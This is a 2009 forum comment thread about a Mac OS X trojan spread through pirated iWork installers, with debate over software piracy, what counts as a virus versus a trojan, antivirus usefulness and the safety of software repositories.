OOoOoooohhhhhh scary.
Not to mention it is users actually INSTALLING A VIRUS themselves. News flash: users can install whatever software they want by hand.
Compare/contrast to the monthly alerts on REMOTE EXPLOITS found in Windows that occur without the users’ intervention/knowledge and learn what the difference is in code quality between the two.
Edited 2009-04-18 13:38 UTC
“Mac OS X doesn’t have trojans.”
“Well, it has a trojan now, but at least it’s not used for anything.”
“Oh, it’s used for botnets now? Well, there’s only one documented case, no big deal.”
I don’t need a pattern recognition system to figure this one out.
What do you expect to get for nothing? If you can’t afford iWork, download OpenOffice for your Mac. Don’t download custom-built iWork packages from sharing sites/software.
I can understand the need to pirate Microsoft Office, when the fancy version is the same price as the PC hardware (WTF Microsoft??), but iWork is reasonably priced and works well.
And *even* then, iWork has no anti-piracy measures in it, neither does it require a serial. Therefore, people are even more stupid for not checking MD5s and trusting any old download to be unmodified.
You’re thinking of iLife, not iWork. iWork does require a serial number, however that is it. There’s no activation or other anti-piracy measures in it, so what a smart person would have done would have been to download iWork directly from Apple and just get the serial from somewhere else if they were going to pirate it. Then again, typically those who pirate software lack in the intelligence department, or at least in common sense.
Still, software piracy (for lack of a better term) is wrong. If you don’t want to pay for the cost of that proprietary software package, don’t use it. Find one that costs less or is free, or go without.
Except you’re wrong in that iWork ’09 does NOT require a serial number like iWork ’08 did.
Oh, yes it does, at least if you download it. I know, as I bought iWork ’09 and received a serial number… and entered it to unlock after my thirty-day trial period had ended. Perhaps if you order it on CD it’s different, and it may very well be different if you bought it with your Mac instead of afterward.
The download version needs a serial no. The disk version doesn’t.
I was reading on Wikipedia the features “missing” from the Mac version of MS Office, when compared to its contemporary Windows counterpart. It seems to me that OpenOffice has better MS Office compatibility on OS X than MS Office.
“Remember the Mac torjan that we reported about earlier this year?”
Nope, Don’t remember any torjans
Why would a Mac user buy anti-virus software, which protects against known viruses, if there never has been an OS X virus?
What exactly would (those sleaze-balls) Symantec be looking for? LOL
Heuristics are fairly reliable. Maybe not Symantec’s … but still.
Symantec is looking to provide us with security so that we can roam about the big bad world of Internet safely, on second thought Symantec might be interested in extracting more money from us by scaring the $hit out of us.
Period… there are iViruses(tm).
…for stupid people that install pirated software like this.
Ah, but there COULD be. How hard would it be to set up a site with md5 sums of “healthy” programs, to compare to warez you download? Even if you don’t trust the site, you’ll know if there’s a problem when the md5s don’t match.
Moredhas wrote:
–“Ah, but there COULD be. How hard would it be to set up a site with md5 sums of “healthy” programs, to compare to warez you download? Even if you don’t trust the site, you’ll know if there’s a problem when the md5s don’t match.”
Uh? These cracks would have to make changes to the program’s code, which would then result in a different md5 hash, no matter if they inserted a trojan or not.
…so a “Virus Scanner” would be near useless in detecting this installation anyway.
As part of an installation app I wrote for one of my companies I have a script that talks to one of our servers to download components used during the installation depending on install-time choices made by the user. It does this all invisibly – just telling the user that it is “Collecting Data” – after getting the user to authenticate. I could have that script do a whole range of other things including install a startup that gives me some remote access – that is very easy to do.
But that is not a virus. It is an app installed by a user. No different to the one in question. The author just piggybacked his app’s installer onto the installer for another app – and that isn’t hard either.
If I wrote an app and called it “ZOMG BEST P~A~RN DOWNLOADER EVERRRRR” that was nothing BUT a bot and stuck it out there as a torrent, some idiot would download and install it, even if it asked for admin privs. And it wouldn’t be a virus either…
I don’t know of any current AV applications that only scan for & remove viruses that meet the literal, technical definition of a virus. All that I’ve used will also remove trojans, or detect them with the background/live scanner if the user tries to install one.
Most applications referred to as “anti-virus” are really “anti-malware,” strictly speaking.
Edited 2009-04-20 00:02 UTC
With the sophistication of most malware these days, regardless of the method they use to infect the user’s (normally Windows) system, they have become very adept at avoiding detection after they have been installed. There are many mechanisms employed, ranging from rootkit-like behaviour (where the OS is not even aware the malware files exist on disk), through to disabling any installed scanners (or, more sophisticated, preventing the installed scanners from detecting just the particular malware in question, but otherwise appearing to work normally).
The only chance one has, on a Windows or Mac OSX system where users routinely install closed-source binary executables, is detection on first access (ie on installation). After installation, very often all bets are off.
Even on-access scanners cannot work on first access for new 0-day malware.
The point of my post was simply that most AV/anti-malware applications are designed to remove trojans and not only viruses. I wasn’t making any statements about their actual effectiveness – which is what most of your post seems to be talking about.
Edited 2009-04-20 00:59 UTC
My post did not dispute anything from your post. Your post’s text was merely related discussion, and I used your post as introduction, context, and pointing out the relevance of my point, which was equally valid to your point.
Today, there is a Mac OS X-based botnet that relies on a user explicitly downloading and running shady software.
Tomorrow, the user will be taken out of the equation.
Indeed and on that day, there will be some actual news to report.
You misunderstand what a virus is. A virus relies on a stupid user to propagate. It *is* different from trojans, but only in that it copies itself to other applications’ code. When these other applications are then “shared” by stupid users with other stupid users the virus copies itself to other applications. Any OS that runs applications at all can have trojans, and almost any OS can have viruses. Nowadays few people actively share files, so viruses are more rare than in the MS-DOS days.
Anyways, user intervention *is* always needed. They might require a lot or a little bit, but it is always needed.
What you are thinking about are worms. Worms only require a remote vulnerability that allows code execution to spread. Mac OS X has been shown to have unpatched remote vulnerabilities, so the only reason that there has been no news release on that is because nobody that knew about them has bothered to write one.
I’m not sure if your reply was to me or the parent of my reply but neither my post nor the parent used the words virus, trojan or any other technical description for what was going on here.
I think the parent referred to it as “shady” software, now I don’t think that’s a new category of malware he’s referring to there, just an all encompassing one.
I was actually planning to stay out of this software-repo stuff but oh well:
Software repos have been quite a pain for me; I generally visit a software’s website and instead of a clean link I find myself filtering a long list of software, where I may or may not find it, considering that either the naming or whatever is wrong, or face sad issues like two versions of the same software (happened to KDE for me on Kubuntu). Repos are a necessity due to the hostility shown towards installation, but they don’t treat the issue that well.
But even then, the fact is that when I try to get a good bunch of software like the latest alphas or certain proprietary software (like Opera), I end up either adding a new URL to the package manager or downloading a deb package.
That reminds me of how my university examinations go (I’m still studying, btw) — there are about 300 affiliated colleges, so the examiners seem to correct solely on the basis of how neat the examination paper looks — to the point that a friend who attempts 1.5 questions in the entire paper gets complete marks for both the questions and passes the examination.
Even in this case, repos tend to carry proprietary software and I’m not sure if they get to look into the code..
Proprietary software in repos => Malware chances
Package Downloads => Malware chances
Custom Repos => strange issues + “theoretical” chances of malware
“Theoretically” Macs were malware-proof too..
@werpu: Yes I know the lines tend to be blurry (despite the apparent distinction demanded in the thread) but Windows Defender’s functionality is only limited to malware, so I said that. The point is that it immediately indicates the installation/presence of a malware; and it’s not like UAC to pop now and then.
I’ve encountered it on only one occasion (*other than msconfig) in the last two years. So unless we’re talking about users like my friend who I posted about, it does its job as intended. User stupidity does count, yes, but we’re talking about “real” stupids here, not the case of “stupider than the average geek” users.
Personally; I think Defender is underrated; probably ‘cuz it’s Microsoft; or probably cuz the beta wasn’t quite effective. It’s based on GIANT antispyware which was quite a good one in the market at that time. Personally I disdain installing alternatives unless we REALLY need to install one (e.g., IE8. thankfully it’ll come to an end..) or if it comes in suites or so..
Edited 2009-04-20 07:19 UTC
Repeat after me … “impeccable record”. “No malware in open source repositories”.
It gets easier if you practice it a bit.
Edited 2009-04-20 09:53 UTC
Practice what? Reading proprietary lines of code? It’d be easier to practice if it weren’t so hilarious.
EDIT:
As for the “impeccable record”, my university has one too… If the repos are clean it’s cuz the PROJECTS are open source, not cuz of the repositories.
Edited 2009-04-20 12:19 UTC
Maybe it gets easier, but it’s still a lie.